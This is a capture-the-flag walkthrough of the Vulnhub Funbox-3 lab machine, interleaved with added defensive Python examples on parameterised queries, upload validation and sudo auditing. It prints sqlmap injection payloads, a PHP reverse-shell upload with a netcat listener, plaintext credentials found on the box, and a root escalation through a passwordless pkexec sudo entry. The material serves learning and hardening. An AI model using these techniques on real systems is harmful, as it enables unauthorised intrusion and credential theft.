Vulnhub: Funbox-3
It is the third box in the Funbox series. The Funbox series from Vulnhub is a great series for beginners. This box has a great flow, and a lot of rabbit holes.
Looking back, I really didn’t explain my steps here at all, yikes!
Scanning:
crazyeights@es-base:~$ nmap -PS 192.168.56.1-255
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 21:54 EDT
Nmap scan report for 192.168.56.118
Host is up (0.000084s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
More Thorough Scanning:
crazyeights@es-base:~$ nmap -A -p- 192.168.56.118
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 21:55 EDT
[SNIP]
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_gym
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
33060/tcp open mysqlx?
[SNIP]
Web Enumeration:
index is apache2 default page
Scanning with dirb:
crazyeights@es-base:~$ dirb http://192.168.56.118
[SNIP]
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.118/ ----
==> DIRECTORY: http://192.168.56.118/admin/
+ http://192.168.56.118/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.118/index.php (CODE:200|SIZE:3468)
+ http://192.168.56.118/robots.txt (CODE:200|SIZE:14)
==> DIRECTORY: http://192.168.56.118/secret/
+ http://192.168.56.118/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.118/store/
---- Entering directory: http://192.168.56.118/admin/ ----
==> DIRECTORY: http://192.168.56.118/admin/assets/
+ http://192.168.56.118/admin/index.php (CODE:200|SIZE:3263)
---- Entering directory: http://192.168.56.118/secret/ ----
+ http://192.168.56.118/secret/index.php (CODE:200|SIZE:108)
+ http://192.168.56.118/secret/robots.txt (CODE:200|SIZE:35)
---- Entering directory: http://192.168.56.118/store/ ----
+ http://192.168.56.118/store/admin.php (CODE:200|SIZE:3153)
[SNIP]
Checking the secret directory:
crazyeights@es-base:~$ curl http://192.168.56.118/secret/
„Anyone who lives within their means suffers from a lack of imagination.“
Oscar Wilde (*1854 - †1900)
- there are several sites on the server: a store, a gym page, and a project management site (?)
- Started with the book store because it looks like it has the most content (without having to log in)
Book store:
- at /store
- book product pages look vulnerable to SQLi
- Trying:
http://192.168.56.118/store/book.php?bookisbn=978-0-321-94786-4 or '1'='1
Response is:
Can't retrieve data You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '1'='1'' at line 1
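The error above is the classic sign that the ISBN from the query string is being pasted straight into the SQL text. The following is an added example, not code from the writeup or from the Funbox VM: it models the book lookup with an in-memory SQLite table (the table, columns and sample ISBNs are constructed) and puts the concatenated query next to a parameterised one, so you can see both the error disclosure and why the bound parameter does not break.

```python
import sqlite3

# Constructed sample catalogue standing in for the store's book table.
SAMPLE_BOOKS = [
    ("978-0-321-94786-4", "Sample Title A", 29.99),
    ("978-0-13-468599-1", "Sample Title B", 35.00),
    ("978-1-59327-290-6", "Sample Title C", 49.95),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (isbn TEXT PRIMARY KEY, title TEXT, price REAL)")
    conn.executemany("INSERT INTO books VALUES (?, ?, ?)", SAMPLE_BOOKS)
    return conn


def lookup_vulnerable(conn, bookisbn):
    """Builds the WHERE clause by string concatenation, so whatever arrives in
    ?bookisbn= becomes part of the SQL statement itself."""
    sql = f"SELECT isbn, title, price FROM books WHERE isbn = '{bookisbn}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, bookisbn):
    """Parameterised query: the value is passed to the driver separately, so
    quotes and keywords inside it are treated as data, never as SQL."""
    sql = "SELECT isbn, title, price FROM books WHERE isbn = ?"
    return conn.execute(sql, (bookisbn,)).fetchall()


def handle_request(conn, bookisbn, lookup, log):
    """Request handler in the shape of book.php. The page on the box echoed the
    database's own error text to the client; here the detail goes to a
    server-side log (a plain list in this example) and the client only gets a
    generic message."""
    try:
        rows = lookup(conn, bookisbn)
    except sqlite3.Error as exc:
        log.append(f"book lookup failed for {bookisbn!r}: {exc}")
        return {"ok": False, "error": "Can't retrieve data", "rows": []}
    return {"ok": True, "rows": rows}


if __name__ == "__main__":
    conn, log = make_db(), []
    # The exact value tried against the box: a syntax error in the concatenated version.
    print(handle_request(conn, "978-0-321-94786-4 or '1'='1", lookup_vulnerable, log))
    # A well-formed tautology returns every row from the vulnerable lookup ...
    print(len(lookup_vulnerable(conn, "x' OR '1'='1")), "rows from the vulnerable lookup")
    # ... and nothing from the parameterised one, because no ISBN has that literal value.
    print(len(lookup_safe(conn, "x' OR '1'='1")), "rows from the safe lookup")
```

The takeaway for a code review of a page like book.php is that the fix is not escaping the quote but never building the statement from the request at all; the generic error message on top of that removes the "You have an error in your SQL syntax" oracle that the scanner in the next step relies on.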
Using sqlmap to dump database:
crazyeights@es-base:~$ sqlmap -u http://192.168.56.118/store/book.php?bookisbn=978-0-321-94786-4 --dump
[SNIP]
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: bookisbn (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bookisbn=978-0-321-94786-4' AND 2942=2942 AND 'uGAX'='uGAX
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: bookisbn=978-0-321-94786-4' AND GTID_SUBSET(CONCAT(0x71707a7871,(SELECT (ELT(2352=2352,1))),0x71767a7071),2352) AND 'Dlzl'='Dlzl
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: bookisbn=978-0-321-94786-4' AND (SELECT 5367 FROM (SELECT(SLEEP(5)))ObXO) AND 'PTKg'='PTKg
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: bookisbn=-5080' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,0x59626b6e544b464b4c655250796a466c6e716b6f706f68696b7154676d6f485975546b7a656c7175,0x71767a7071),NULL,NULL,NULL,NULL-- -
---
[SNIP]
Cracking admin hash with sqlmap:
Database: store
Table: admin
[1 entry]
+-------+--------------------------------------------------+
| name | pass |
+-------+--------------------------------------------------+
| admin | d033e22ae348aeb5660fc2140aec35850c4da997 (admin) |
+-------+--------------------------------------------------+
Logging in as admin:
- at /store/admin.php with credentials admin:admin
- As admin you can upload images for book covers; it doesn't seem to limit you to just images
- Will try to upload a php reverse shell
- images are stored at: http://192.168.56.118/store/bootstrap/img/
- It would appear that the backend of this site doesn't actually do anything.
- It just takes a few minutes for the file to upload for some reason
- Start netcat: nc -lvp 1234
Click on php-reverse-shell.php
crazyeights@es-base:~$ nc -lvp 1234
listening on [any] 1234 ...
192.168.56.118: inverse host lookup failed: Unknown host
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.118] 55336
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
02:38:01 up 44 min, 0 users, load average: 0.00, 0.01, 0.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
$ cd /home
$ ls
tony
$ cd tony
$ ls
password.txt
$ cat password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
$
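The upload form accepted a .php file as a "book cover" and dropped it into a directory the web server executes from, which is the whole reason the click above returned a shell. The following is an added example, not the store's own code: a validation routine for that upload step that checks the extension against an allowlist, requires the file content to carry the magic bytes of the type it claims, and discards the client's filename in favour of a random server-side name. The allowlist, size limit and sample payloads are constructed for the example.

```python
import os
import re
import secrets

# Allowed cover types and the leading bytes each format must start with (constructed allowlist).
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_BYTES = 2 * 1024 * 1024  # 2 MiB is plenty for a cover image
SAFE_STEM = re.compile(r"[a-z0-9_-]+")

# Constructed sample inputs: a minimal PNG header and a non-image file dressed up as one.
PNG_SAMPLE = ALLOWED_TYPES["png"] + b"\x00" * 32
NOT_AN_IMAGE = b"<?php /* constructed stand-in for a script upload */ ?>"


def validate_cover_upload(filename: str, data: bytes):
    """Return (True, stored_name) for an acceptable image, else (False, reason).

    The client-supplied name is only used for the extension decision; the file
    is stored under a random name so nothing the uploader chose reaches disk."""
    name = os.path.basename(filename.replace("\\", "/")).lower()
    parts = name.rsplit(".", 1)
    # Exactly one extension, simple stem: rejects "cover.php.png" style double extensions.
    if len(parts) != 2 or not SAFE_STEM.fullmatch(parts[0]):
        return False, "filename must be name.ext with a plain name"
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} is not an allowed image type"
    if not data or len(data) > MAX_BYTES:
        return False, "empty or oversized upload"
    # The bytes must be the format the extension claims; a renamed script fails here.
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match the declared image type"
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for fname, payload in [
        ("php-reverse-shell.php", NOT_AN_IMAGE),  # wrong extension
        ("cover.php.png", PNG_SAMPLE),            # double extension
        ("cover.png", NOT_AN_IMAGE),              # renamed script
        ("../../cover.png", PNG_SAMPLE),          # path traversal in the name, real image
    ]:
        print(fname, "->", validate_cover_upload(fname, payload))
```

Two server-side settings matter as much as the check itself: store uploads in a directory with no script handler (or outside the document root and serve them through a read-only handler), and keep the directory non-executable. With both in place, even a validation bug cannot turn an image upload into code execution as www-data.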
- the gym site actually did something, huh…
- The SSH password for tony is in the password file
Logging into SSH as tony:
tony:yxcvbnmYYY
crazyeights@es-base:~$ ssh tony@192.168.56.118
tony@192.168.56.118's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)
[SNIP]
tony@funbox3:~$
Checking html directory:
I have no idea what the rest of this is for, so many rabbit holes…
tony@funbox3:~$ cd /var/www/html
tony@funbox3:/var/www/html$ ls
admin gym logout.php
change-password.php header.php profile.php
checklogin.php hitcounter.txt registration.php
create-ticket.php index.html robots.txt
dashboard.php index.php secret
dbconnection.php jquery-1.2.6.min.js store
forgot-password.php jquery.timers-1.0.0.js view-tickets.php
get-quote.php leftbar.php
Priv Esc:
Finding commands tony can run with elevated privileges:
tony@funbox3:/var/www/html$ sudo -l
Matching Defaults entries for tony on funbox3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tony may run the following commands on funbox3:
(root) NOPASSWD: /usr/bin/yelp
(root) NOPASSWD: /usr/bin/dmf
(root) NOPASSWD: /usr/bin/whois
(root) NOPASSWD: /usr/bin/rlogin
(root) NOPASSWD: /usr/bin/pkexec
(root) NOPASSWD: /usr/bin/mtr
(root) NOPASSWD: /usr/bin/finger
(root) NOPASSWD: /usr/bin/time
(root) NOPASSWD: /usr/bin/cancel
(root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
Interesting:
pkexec - Execute a command as another user
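A sudoers line that lets a user run a command launcher like pkexec as root without a password is functionally the same as giving that user a root shell, and a NOPASSWD entry pointing at a script under /root deserves a look at who can write to it. As an added example that is not part of the writeup, here is a small parser and audit for `sudo -l` output of the shape shown above. The sample text is constructed from that listing (shortened), the wrapped entry is handled the way the extraction above split it, and the set of "command runner" binaries is an assumption seeded only with pkexec; extend it from your own references.

```python
import re
from dataclasses import dataclass

# Constructed from the listing above; only a few of the entries are kept.
SAMPLE_SUDO_L = """\
User tony may run the following commands on funbox3:
    (root) NOPASSWD: /usr/bin/yelp
    (root) NOPASSWD: /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD:
        /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
"""

# "(runas) TAG: TAG: /path args" -- tags are the upper-case words ending in a colon.
ENTRY_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.*)$")
STANDARD_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/local/bin/", "/usr/local/sbin/")
COMMAND_RUNNERS = {"pkexec"}  # assumption: binaries whose job is to run another command


@dataclass
class Entry:
    runas: str
    nopasswd: bool
    command: str


def parse_sudo_l(text: str):
    """Turn the 'may run the following commands' section into Entry objects."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        # A bare path continues the previous entry when sudo (or a copy-paste) wrapped it.
        if line.startswith("/") and entries and entries[-1].command == "":
            entries[-1].command = line
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        entries.append(Entry(m["runas"].strip(), "NOPASSWD:" in m["tags"], m["cmd"].strip()))
    return entries


def audit(entries):
    """Return (command, finding) pairs, most severe reason first per entry."""
    findings = []
    for e in entries:
        if e.command == "ALL":
            findings.append((e.command, "unrestricted: equivalent to root"))
            continue
        path = e.command.split()[0]
        base = path.rsplit("/", 1)[-1]
        if e.runas == "root" and e.nopasswd and base in COMMAND_RUNNERS:
            findings.append((e.command, "runs arbitrary commands as root without a password"))
        elif not path.startswith(STANDARD_DIRS):
            findings.append((e.command, "non-standard path: check owner and write permissions"))
        elif e.nopasswd:
            findings.append((e.command, "NOPASSWD: confirm the binary cannot spawn a shell or read files"))
    return findings


if __name__ == "__main__":
    for command, finding in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{finding:<70} {command}")
```

Run against real output, the useful policy is to treat every NOPASSWD entry as a finding until someone has argued why that specific binary, with those specific arguments, cannot be turned into something else; the fix for the pkexec line is simply to remove it, since there is no argument-level restriction that makes a command launcher safe.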
Testing it out:
tony@funbox3:~$ sudo pkexec --user root /usr/bin/ls /root
root.flag snap
Getting root:
tony@funbox3:~$ sudo pkexec --user root /bin/bash -i
root@funbox3:~#
Getting the root flag:
root@funbox3:~# cd /root
root@funbox3:~# ls
root.flag snap
root@funbox3:~# cat root.flag
__________ ___. ___________
\_ _____/_ __ ____\_ |__ _______ ___ /\ \_ _____/____ _________.__.
| __)| | \/ \| __ \ / _ \ \/ / \/ | __)_\__ \ / ___< | |
| \ | | / | \ \_\ ( <_> > < /\ | \/ __ \_\___ \ \___ |
\___ / |____/|___| /___ /\____/__/\_ \ \/ /_______ (____ /____ >/ ____|
\/ \/ \/ \/ \/ \/ \/ \/
Made with ❤ from twitter@0815R2d2. Please, share this on twitter if you want.
root@funbox3:~#
this one was awesome. just the right level of easy to make you feel like a boss while doing it. 10/10
FIN.